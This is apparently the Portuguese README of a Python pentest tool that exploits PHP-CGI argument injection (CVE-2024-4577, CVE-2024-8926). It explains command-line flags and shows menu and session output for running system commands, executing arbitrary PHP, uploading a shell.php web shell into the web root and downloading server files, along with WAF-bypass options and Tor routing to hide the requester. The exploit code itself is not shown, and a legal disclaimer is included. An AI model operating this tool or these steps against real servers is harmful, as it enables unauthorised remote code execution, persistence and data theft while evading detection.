
Uma ferramenta de pentest para testar CVE-2024-4577 e CVE-2024-8926.
🚀 Ferramenta de Exploração CVE-2024-4577 e CVE-2024-8926
Ferramenta de teste automatizada para a vulnerabilidade de injeção de parâmetros PHP-CGI, suportando CVE-2024-4577 e CVE-2024-8926, permitindo execução de comandos, upload/download de arquivos, etc.
Esta ferramenta pode ser usada para testar vulnerabilidades de injeção de parâmetros em ambientes PHP-CGI, oferecendo:
Esta ferramenta destina-se exclusivamente a testes legítimos e fins acadêmicos. Não utilize em sistemas não autorizados!
⚠️ O uso ilegal implicará em responsabilidade legal!
Esta ferramenta é destinada apenas a:
Esta ferramenta depende dos seguintes pacotes Python. Instale primeiro:
pip install -r requirements.txt
Ou instale manualmente:
pip install requests requests-tor chardet urllib3 rich
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]
Exemplo:
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php
Quando o script encontra uma vulnerabilidade, exibe o menu:
╭──────────── Menu do Modo Exploit ────────────╮
│ Alvo atual: http://example.com/ │
│ Ponto de injeção atual: /php-cgi/php-cgi.exe │
│ ID da vulnerabilidade: CVE-2024-4577 │
╰────────────────────────────────────────────────╯
1) 🧪 Modo Shell
2) 🛠️ Modo PHP Personalizado
3) 📤 Upload de Arquivo
4) 📥 Download de Arquivo
5) 🎯 Alternar Alvo
6) ⚙️ Configurações
7) ❌ Sair
>>
Executa comandos do sistema:
shell> whoami
📂 Salvar saída
shell> whoami --save
shell> whoami --save C:\output\whoami.txt
Executa código PHP personalizado:
phpinfo();
EOF
📂 Salvar saída
phpinfo();
EOF --save
phpinfo();
EOF --save C:\output\info.html
Caminho do arquivo local: C:\test\shell.php
Caminho completo no destino:
[*] Caminho de upload definido automaticamente como: C:/xampp/htdocs/shell.php
📂 Caminho manual
Caminho completo no destino: C:\xampp\php\shell.php
Caminho do arquivo remoto: C:\xampp\htdocs\index.php
📂 O arquivo é salvo em download/; se houver duplicatas, um número é adicionado automaticamente
[*] Download concluído, salvo em download/index.php
Digite a nova URL alvo: http://newtarget.com
🔹 A vulnerabilidade será testada novamente
[⚙️ Menu de Configuração de Parâmetros da Fase de Exploração]
1) Alternar Payload 1
2) Bypass Não selecionado
3) Timeout 10 segundos
4) Delay 0 segundos
5) Registro Automático Desligado
6) Modo Detalhado Desligado
7) Efeitos Animados Ligado
8) Exploração Forçada Desligado
9) Salvar e Voltar ao Menu Exploit
Oferece as seguintes estratégias de bypass:
php://input por outras sintaxes| Parâmetro | Descrição | Exemplo |
|---|
-u , --url | Define a URL alvo | -u http://example.com |
--timeout sec | Define o timeout da requisição (0 = infinito) | --timeout 30 |
--log | Registra automaticamente comandos shell | --log |
--payload | Define ou personaliza o Payload | --payload 2 |
--tor | Envia requisições via Tor | --tor |
--verbose | Exibe mensagens detalhadas | --verbose |
--bypass | Ativa o modo de bypass WAF | --bypass |
--force | Força a entrada no modo de exploração | --force |
--cgipoint PATHS | Especifica caminhos CGI para teste | --cgipoint /path |
--delay sec | Atraso em segundos entre requisições | --delay 1.5 |
--no-effects | Desativa todos os efeitos animados e atrasos | --no-effects |